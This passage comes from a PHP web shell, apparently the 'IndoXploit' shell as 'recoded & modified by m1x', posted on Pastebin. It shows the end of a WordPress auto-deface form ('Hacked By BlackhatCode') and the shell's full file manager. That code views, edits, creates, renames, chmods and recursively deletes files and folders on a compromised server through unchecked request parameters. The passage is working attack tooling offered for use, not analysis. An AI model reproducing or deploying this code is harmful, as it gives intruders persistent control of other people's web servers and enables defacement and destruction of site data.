  3758.         <textarea name='link' placeholder='http://target.com/folder_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  3759.         <input type='text' name='script' height='10' size='50' placeholder='Hacked By BlackhatCode' required><br>
  3760.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Start Now!'>
  3761.         </form></center>";
  3762.     }
  3763. } elseif($_GET['act'] == 'newfile') {
  3764.     if($_POST['new_save_file']) {
  3765.         $newfile = htmlspecialchars($_POST['newfile']);
  3766.         $fopen = fopen($newfile, "a+");
  3767.         if($fopen) {
  3768.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  3769.         } else {
  3770.             $act = "<font color=red>Permission denied</font>";
  3771.         }
  3772.     }
  3773.     echo $act;
  3774.     echo "<form method='post'>
  3775.     Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  3776.     <input type='submit' name='new_save_file' value='Submit'>
  3777.     </form>";
  3778. } elseif($_GET['act'] == 'newfolder') {
  3779.     if($_POST['new_save_folder']) {
  3780.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  3781.         if(!mkdir($new_folder)) {
  3782.             $act = "<font color=red>Permission denied</font>";
  3783.         } else {
  3784.             $act = "<script>window.location='?dir=".$dir."';</script>";
  3785.         }
  3786.     }
  3787.     echo $act;
  3788.     echo "<form method='post'>
  3789.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  3790.     <input type='submit' name='new_save_folder' value='Submit'>
  3791.     </form>";
  3792. } elseif($_GET['act'] == 'rename_dir') {
  3793.     if($_POST['dir_rename']) {
  3794.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  3795.         if($dir_rename) {
  3796.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  3797.         } else {
  3798.             $act = "<font color=red>Permission denied</font>";
  3799.         }
  3800.     echo "".$act."<br>";
  3801.     }
  3802.     echo "<form method='post'>
  3803.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  3804.     <input type='submit' name='dir_rename' value='Rename'>
  3805.     </form>";
  3806. } elseif($_GET['act'] == 'chmod_dir'){
  3807.     if($_GET['dir']){
  3808.     echo "Current Directory: <font color='lime'>" . $_GET['dir'] . "</font>";
  3809.     echo "<br>The mode parameter consists of four numbers:<br>
  3810. <br>
  3811.    ~The first number is always zero<br>
  3812.    ~The second number specifies permissions for the owner<br>
  3813.    ~The third number specifies permissions for the owner's user group<br>
  3814.    ~The fourth number specifies permissions for everybody else<br>
  3815. <br>
  3816. Possible values (to set multiple permissions, add up the following numbers):<br>
  3817. <br>
  3818.    1 = execute permissions<br>
  3819.    2 = write permissions<br>
  3820.    4 = read permissions<br>
  3821.    <br>
  3822. ";
  3823.     echo "<form method='post'><input type='text' size='4' name='dirchmod' placeholder='".substr(sprintf('%o', fileperms($_GET['dir'])),-4)."'><input type='submit' value='set permission'></form>";
  3824.         if(!empty($_POST['dirchmod'])){
  3825.         $pers = 0;
  3826.                 for($i=strlen($_POST['dirchmod'])-1;$i>=0;--$i)
  3827.                     $pers += (int)$_POST['dirchmod'][$i]*pow(8, (strlen($_POST['dirchmod'])-$i-1));
  3828.         if(!@chmod($_GET['file'], $pers)){
  3829.             echo "<font color='red'>Gagal ganti Permission!</font>";
  3830.         }else{
  3831.             echo "Permission sukses di ganti bos!";
  3832.         }
  3833.     }
  3834.         }
  3835.     }elseif($_GET['act'] == 'delete_dir') {
  3836.     function Delete($path)
  3837. {
  3838.     if (is_dir($path) === true)
  3839.     {
  3840.         $files = array_diff(scandir($path), array('.', '..'));
  3841.         foreach ($files as $file)
  3842.         {
  3843.             Delete(realpath($path) . '/' . $file);
  3844.         }
  3845.         return rmdir($path);
  3846.     }
  3847.     else if (is_file($path) === true)
  3848.     {
  3849.         return unlink($path);
  3850.     }
  3851.     return false;
  3852. }
  3853.     $delete_dir = Delete($dir);
  3854.     if($delete_dir) {
  3855.         $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  3856.     } else {
  3857.         $act = "<font color=red>could not remove ".basename($dir)."</font>";
  3858.     }
  3859.     echo $act;
  3860. } elseif($_GET['act'] == 'view') {
  3861.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>View</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>Edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>Rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>Download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>Delete</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>Chmod</a> ]<br>";
  3862.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  3863. } elseif($_GET['act'] == 'edit') {
  3864.     if($_POST['save']) {
  3865.         $save = file_put_contents($_GET['file'], $_POST['src']);
  3866.         if($save) {
  3867.             $act = "<font color=lime>Saved!</font>";
  3868.         } else {
  3869.             $act = "<font color=red>Permission denied!</font>";
  3870.         }
  3871.     echo "".$act."<br>";
  3872.     }
  3873.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>View</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>Rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>Download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>Delete</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>Chmod</a> ]<br>";
  3874.     echo "<form method='post'>
  3875.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  3876.     <input type='submit' value='Save' name='save' style='width: 500px;'>
  3877.     </form>";
  3878. } elseif($_GET['act'] == 'rename') {
  3879.     if($_POST['do_rename']) {
  3880.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  3881.         if($rename) {
  3882.             $act = "<script>window.location='?dir=".$dir."';</script>";
  3883.         } else {
  3884.             $act = "<font color=red>Permission denied</font>";
  3885.         }
  3886.     echo "".$act."<br>";
  3887.     }
  3888.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>View</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>Edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>Rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>Download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>Delete</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>Chmod</a> ]<br>";
  3889.     echo "<form method='post'>
  3890.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  3891.     <input type='submit' name='do_rename' value='Rename'>
  3892.     </form>";
  3893. } elseif($_GET['act'] == 'chmod'){
  3894.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>View</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>Edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>Rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>Download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>Delete</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'><b>Chmod</b></a> ]<br>";
  3895.  
  3896.     echo "<br>The mode parameter consists of four numbers:<br>
  3897. <br>
  3898.    ~The first number is always zero<br>
  3899.    ~The second number specifies permissions for the owner<br>
  3900.    ~The third number specifies permissions for the owner's user group<br>
  3901.    ~The fourth number specifies permissions for everybody else<br>
  3902. <br>
  3903. Possible values (to set multiple permissions, add up the following numbers):<br>
  3904. <br>
  3905.    1 = execute permissions<br>
  3906.    2 = write permissions<br>
  3907.    4 = read permissions<br>
  3908.    <br>
  3909. ";
  3910.     echo "<form method='post'><input type='text' size='4' name='filechmod' placeholder='".substr(sprintf('%o', fileperms($_GET['file'])),-4)."'>&nbsp;<input type='submit' value='Set permission'></form>";
  3911.  
  3912.     if(!empty($_POST['filechmod'])){
  3913.         $pems = 0;
  3914.                 for($i=strlen($_POST['filechmod'])-1;$i>=0;--$i)
  3915.                     $pems += (int)$_POST['filechmod'][$i]*pow(8, (strlen($_POST['filechmod'])-$i-1));
  3916.         if(!@chmod($_GET['file'], $pems)){
  3917.             echo "<font color='red'>Cant Set Permission!</font>";
  3918.         }else{
  3919.             echo "Permission Set!";
  3920.         }
  3921.     }
  3922.  
  3923. }elseif($_GET['act'] == 'delete') {
  3924.     $delete = unlink($_GET['file']);
  3925.     if($delete) {
  3926.         $act = "<script>window.location='?dir=".$dir."';</script>";
  3927.     } else {
  3928.         $act = "<font color=red>Permission denied!</font>";
  3929.     }
  3930.     echo $act;
  3931. }else {
  3932.     if(is_dir($dir) == true) {
  3933.         echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  3934.         <tr>
  3935.         <th class="th_home"><center>FILE NAME</center></th>
  3936.         <th class="th_home"><center>TYPE</center></th>
  3937.         <th class="th_home"><center>SIZE</center></th>
  3938.         <th class="th_home"><center>LAST MODIFIED</center></th>
  3939.         <th class="th_home"><center>OWNED:GROUP</center></th>
  3940.         <th class="th_home"><center>PERMISSION</center></th>
  3941.         <th class="th_home"><center>ACTIONS</center></th>
  3942.         </tr>';
  3943.         $scandir = scandir($dir);
  3944.         foreach($scandir as $dirx) {
  3945.             $dtype = filetype("$dir/$dirx");
  3946.             $dtime = date("d F Y g:i:s", filemtime("$dir/$dirx"));
  3947.             if(function_exists('posix_getpwuid')) {
  3948.                     $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  3949.                     $downer = $downer['name'];
  3950.                 } else {
  3951.                     //$downer = $uid;
  3952.                     $downer = fileowner("$dir/$dirx");
  3953.                 }
  3954.                 if(function_exists('posix_getgrgid')) {
  3955.                     $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  3956.                     $dgrp = $dgrp['name'];
  3957.                 } else {
  3958.                     $dgrp = filegroup("$dir/$dirx");
  3959.                 }
  3960.             if(!is_dir("$dir/$dirx")) continue;
  3961.             if($dirx === '..') {
  3962.                 $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  3963.             } elseif($dirx === '.') {
  3964.                 $href = "<a href='?dir=$dir'>$dirx</a>";
  3965.             } else {
  3966.                 $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  3967.             }
  3968.             if($dirx === '.' || $dirx === '..') {
  3969.                 $act_dir = "<a href='?act=newfile&dir=$dir'>New File</a> | <a href='?act=newfolder&dir=$dir'>New Folder</a>";
  3970.                 } else {
  3971.                 $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>Rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>Delete</a> | <a href='?act=chmod&dir=$dir&file=$dir/$file'>Chmod</a>";
  3972.             }
  3973.             echo "<tr>";
  3974.             echo "<td class='td_home' style='text-shadow: 0pt 0pt 0.6em lime, 0pt 0pt 0.6em lime;color: #00ff00;text-decoration: none;'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  3975.             echo "<td class='td_home' style='text-shadow: 0pt 0pt 0.6em lime, 0pt 0pt 0.6em lime;color: #00ff00;text-decoration: none;'><center>$dtype</center></td>";
  3976.             echo "<td class='td_home' style='text-shadow: 0pt 0pt 0.6em lime, 0pt 0pt 0.6em lime;color: #00ff00;text-decoration: none;'><center>-</center></th>";
  3977.             echo "<td class='td_home' style='text-shadow: 0pt 0pt 0.6em lime, 0pt 0pt 0.6em lime;color: #00ff00;text-decoration: none;'><center>$dtime</center></td>";
  3978.             echo "<td class='td_home' style='text-shadow: 0pt 0pt 0.6em lime, 0pt 0pt 0.6em lime;color: #00ff00;text-decoration: none;'><center>$downer/$dgrp</center></td>";
  3979.             echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  3980.             echo "<td class='td_home' style='padding-left: 15px;text-shadow: 0pt 0pt 0.6em lime, 0pt 0pt 0.6em lime;color: #00ff00;text-decoration: none;text-align:center;'>$act_dir</td>";
  3981.         }
  3982.         echo "</tr>";
  3983.         foreach($scandir as $file) {
  3984.             $ftype = filetype("$dir/$file");
  3985.             $ftime = date("d F Y g:i:s", filemtime("$dir/$file"));
  3986.             $size = filesize("$dir/$file")/1024;
  3987.             $size = round($size,3);
  3988.             if(function_exists('posix_getpwuid')) {
  3989.                 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  3990.                 $fowner = $fowner['name'];
  3991.             } else {
  3992.                 //$downer = $uid;
  3993.                 $fowner = fileowner("$dir/$file");
  3994.             }
  3995.             if(function_exists('posix_getgrgid')) {
  3996.                 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  3997.                 $fgrp = $fgrp['name'];
  3998.             } else {
  3999.                 $fgrp = filegroup("$dir/$file");
  4000.             }
  4001.             if($size > 1024) {
  4002.                 $size = round($size/1024,2). ' MB';
  4003.             } else {
  4004.                 $size = $size. ' KB';
  4005.             }
  4006.             if(!is_file("$dir/$file")) continue;
  4007.             echo "<tr>";
  4008.             echo "<td class='td_home' style='text-shadow: 0pt 0pt 0.6em lime, 0pt 0pt 0.6em lime;color: #00ff00;text-decoration: none;'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  4009.             echo "<td class='td_home' style='text-shadow: 0pt 0pt 0.6em lime, 0pt 0pt 0.6em lime;color: #00ff00;text-decoration: none;'><center>$ftype</center></td>";
  4010.             echo "<td class='td_home' style='text-shadow: 0pt 0pt 0.6em lime, 0pt 0pt 0.6em lime;color: #00ff00;text-decoration: none;'><center>$size</center></td>";
  4011.             echo "<td class='td_home' style='text-shadow: 0pt 0pt 0.6em lime, 0pt 0pt 0.6em lime;color: #00ff00;text-decoration: none;'><center>$ftime</center></td>";
  4012.             echo "<td class='td_home' style='text-shadow: 0pt 0pt 0.6em lime, 0pt 0pt 0.6em lime;color: #00ff00;text-decoration: none;'><center>$downer/$dgrp</center></td>";
  4013.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  4014.             echo "<td class='td_home' style='padding-left: 15px;text-shadow: 0pt 0pt 0.6em lime, 0pt 0pt 0.6em lime;color: #00ff00;text-decoration: none;text-align:center;'><a href='?act=edit&dir=$dir&file=$dir/$file'>Edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>Rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>Delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>Download</a> | <a href='?act=chmod&dir=$dir&file=$dir/$file'>Chmod</a></td>";
  4015.         }
  4016.         echo "</tr></table>";
  4017.     } else {
  4018.         echo "<font color=red>Can't Open Directory</font>";
  4019.     }
  4020.     }
  4021. echo "<center><hr class='gayane'><form>
  4022. <noscript><input type='submit' value='Submit'></noscript>
  4023. </form>Copyright &copy; ".date("Y")." - <font color=lime>IndoXploit</font><br>
  4024. <div><div><span style='color:#ff0000;'>R</span><span style='color:#ff1900;'>e</span><span style='color:#ff3300;'>c</span><span style='color:#ff4c00;'>o</span><span style='color:#ff6600;'>d</span><span style='color:#ff7f00;'>e</span><span style='color:#ff9900;'>d</span><span style='color:#ffb200;'> </span><span style='color:#ffcc00;'>&</span><span style='color:#ffe500;'> </span><span style='color:#ffff00;'>M</span><span style='color:#bfff00;'>o</span><span style='color:#80ff00;'>d</span><span style='color:#40ff00;'>i</span><span style='color:#00ff00;'>f</span><span style='color:#00ff33;'>i</span><span style='color:#00ff66;'>e</span><span style='color:#00ff99;'>d</span><span style='color:#00ffcc;'> </span><span style='color:#00ffff;'>b</span><span style='color:#00ccff;'>y</span><span style='color:#0099ff;'> </span><span style='color:#0066ff;'>m</span><span style='color:#0033ff;'>1</span><span style='color:#0000ff;'>x</span></div></div></center>";
  4025. ?>
  4026. </html>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!